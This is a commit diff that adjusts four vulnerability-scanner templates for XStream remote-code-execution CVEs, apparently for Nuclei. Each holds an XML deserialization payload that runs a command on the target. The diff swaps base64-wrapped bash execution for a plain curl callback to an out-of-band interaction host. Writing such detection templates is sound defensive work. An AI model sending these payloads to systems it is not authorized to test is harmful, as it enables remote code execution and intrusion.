fix xstream
parent
6155b39e5b
commit
5b88116b2e
|
@ -2,16 +2,16 @@ id: CVE-2013-7285
|
|||
|
||||
info:
|
||||
name: XStream <1.4.6/1.4.10 - Remote Code Execution
|
||||
author: pwnhxl
|
||||
author: pwnhxl,vicrack
|
||||
severity: critical
|
||||
description: |
|
||||
Xstream API before 1.4.6 and 1.4.10 is susceptible to remote code execution. If the security framework has not been initialized, an attacker can run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. This can allow an attacker to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
|
||||
reference:
|
||||
- http://x-stream.github.io/CVE-2013-7285.html
|
||||
- https://x-stream.github.io/CVE-2013-7285.html
|
||||
- https://www.mail-archive.com/user@xstream.codehaus.org/msg00607.html
|
||||
- https://www.mail-archive.com/user@xstream.codehaus.org/msg00604.html
|
||||
- https://nvd.nist.gov/vuln/detail/cve-2013-7285
|
||||
- https://blog.csdn.net/Xxy605/article/details/126297121
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -30,17 +30,21 @@ http:
|
|||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
|
||||
<sorted-set>
|
||||
<string>foo</string>
|
||||
<contact class='dynamic-proxy'>
|
||||
<interface>org.company.model.Contact</interface>
|
||||
<interface>java.lang.Comparable</interface>
|
||||
<handler class='java.beans.EventHandler'>
|
||||
<target class='java.lang.ProcessBuilder'>
|
||||
<command>
|
||||
<string>curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'</string>
|
||||
<string>curl</string>
|
||||
<string>http://{{interactsh-url}}</string>
|
||||
</command>
|
||||
</target>
|
||||
<action>start</action>
|
||||
</handler>
|
||||
</contact>
|
||||
</sorted-set>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
@ -52,6 +56,5 @@ http:
|
|||
- type: word
|
||||
part: interactsh_request
|
||||
words:
|
||||
- "User-Agent: {{rand_base(6)}}"
|
||||
|
||||
- "User-Agent: curl"
|
||||
# Enhanced by md on 2023/04/12
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2020-26217
|
|||
|
||||
info:
|
||||
name: XStream <1.4.14 - Remote Code Execution
|
||||
author: pwnhxl
|
||||
author: pwnhxl,vicrack
|
||||
severity: high
|
||||
description: |
|
||||
XStream before 1.4.14 is susceptible to remote code execution. An attacker can run arbitrary shell commands by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Users who rely on blocklists are affected.
|
||||
|
@ -47,7 +47,8 @@ http:
|
|||
<outer-class>
|
||||
<java.lang.ProcessBuilder>
|
||||
<command>
|
||||
<string>curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'</string>
|
||||
<string>curl</string>
|
||||
<string>http://{{interactsh-url}}</string>
|
||||
</command>
|
||||
</java.lang.ProcessBuilder>
|
||||
</outer-class>
|
||||
|
@ -92,6 +93,5 @@ http:
|
|||
- type: word
|
||||
part: interactsh_request
|
||||
words:
|
||||
- "User-Agent: {{rand_base(6)}}"
|
||||
|
||||
- "User-Agent: curl"
|
||||
# Enhanced by md on 2023/04/12
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2021-21345
|
|||
|
||||
info:
|
||||
name: XStream <1.4.16 - Remote Code Execution
|
||||
author: pwnhxl
|
||||
author: pwnhxl,vicrack
|
||||
severity: critical
|
||||
description: |
|
||||
XStream before 1.4.16 is susceptible to remote code execution. An attacker who has sufficient rights can execute host commands via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
|
||||
|
@ -22,9 +22,6 @@ info:
|
|||
metadata:
|
||||
max-request: 1
|
||||
|
||||
variables:
|
||||
rand: "{{rand_base(6)}}"
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
|
@ -76,7 +73,7 @@ http:
|
|||
</bridge>
|
||||
</bridge>
|
||||
<jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'>
|
||||
<activationCmd>/bin/bash -c {echo,{{base64("curl http://{{interactsh-url}} -H \'User-Agent: {{rand}}\'")}}}|{base64,-d}|{bash,-i}</activationCmd>
|
||||
<activationCmd>curl http://{{interactsh-url}}</activationCmd>
|
||||
</jaxbObject>
|
||||
</dataSource>
|
||||
</message>
|
||||
|
@ -102,4 +99,4 @@ http:
|
|||
- type: word
|
||||
part: interactsh_request
|
||||
words:
|
||||
- "User-Agent: {{rand}}"
|
||||
- "User-Agent: curl"
|
||||
|
|
|
@ -2,12 +2,11 @@ id: CVE-2021-39144
|
|||
|
||||
info:
|
||||
name: XStream 1.4.18 - Remote Code Execution
|
||||
author: pwnhxl
|
||||
author: pwnhxl,vicrack
|
||||
severity: high
|
||||
description: |
|
||||
XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted.
|
||||
reference:
|
||||
- http://x-stream.github.io/CVE-2021-39144.html
|
||||
- https://x-stream.github.io/CVE-2021-39144.html
|
||||
- https://github.com/x-stream/xstream/security/advisories/GHSA-j9h8-phrw-h4fh
|
||||
- https://security.netapp.com/advisory/ntap-20210923-0003/
|
||||
|
@ -22,9 +21,6 @@ info:
|
|||
metadata:
|
||||
max-request: 1
|
||||
|
||||
variables:
|
||||
rand: "{{rand_base(6)}}"
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
|
@ -67,7 +63,7 @@ http:
|
|||
</probes>
|
||||
</handler>
|
||||
</dynamic-proxy>
|
||||
<string>/bin/bash -c {echo,{{base64("curl http://{{interactsh-url}} -H \'User-Agent: {{rand}}\'")}}}|{base64,-d}|{bash,-i}</string>
|
||||
<string>curl http://{{interactsh-url}}</string>
|
||||
</java.util.PriorityQueue>
|
||||
</java.util.PriorityQueue>
|
||||
|
||||
|
@ -81,6 +77,5 @@ http:
|
|||
- type: word
|
||||
part: interactsh_request
|
||||
words:
|
||||
- "User-Agent: {{rand}}"
|
||||
|
||||
- "User-Agent: curl"
|
||||
# Enhanced by cs on 2023/04/17
|
||||
|
|
Loading…
Reference in New Issue